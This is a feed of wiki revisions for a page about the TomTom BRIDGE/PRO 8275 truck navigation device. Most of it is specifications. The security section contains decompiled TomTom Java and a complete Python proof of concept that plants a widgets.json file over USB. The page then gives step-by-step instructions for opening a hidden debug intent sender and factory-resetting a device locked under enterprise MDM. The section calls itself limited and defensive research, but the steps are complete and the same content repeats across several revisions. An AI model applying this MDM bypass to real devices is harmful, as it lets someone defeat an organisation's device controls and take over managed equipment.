    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
File:Error after injection.jpg|Error after injection&lt;br /&gt;
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen&lt;br /&gt;
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Unlocking Factory Tools ===== &lt;br /&gt;
Go to About your TomTom device. Now top Model number 5 times.&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
File:Factory tools.jpg|Factory Tools&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3305</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3305"/>
		<updated>2026-04-04T01:26:54Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: final ver.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Tomtom0.png|right|300px]]&lt;br /&gt;
[[File:Tomtom1.png|right|300px]]&lt;br /&gt;
&lt;br /&gt;
== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)&lt;br /&gt;
* Build number: '''17.223.2780796.4807.122 OS italia-rel-17.2.21095'''&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;font-size: 90%; max-width: 600px;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;font-size: 90%; max-width: 600px;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable function in the WidgetInfoFetcher class in question.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot; highlight=&amp;quot;36&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
File:Error after injection.jpg|Error after injection&lt;br /&gt;
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen&lt;br /&gt;
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Unlocking Factory Tools ===== &lt;br /&gt;
Go to About your TomTom device. Now top Model number 5 times.&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
File:Factory tools.jpg|Factory Tools&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Tomtom1.png&amp;diff=3304</id>
		<title>File:Tomtom1.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Tomtom1.png&amp;diff=3304"/>
		<updated>2026-04-04T01:22:39Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Tomtom0.png&amp;diff=3303</id>
		<title>File:Tomtom0.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Tomtom0.png&amp;diff=3303"/>
		<updated>2026-04-04T01:22:24Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3302</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3302"/>
		<updated>2026-04-04T01:08:12Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: final fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)&lt;br /&gt;
* Build number: 17.223.2780796.4807.122 OS italia-rel-17.2.21095&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&amp;lt;/br&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
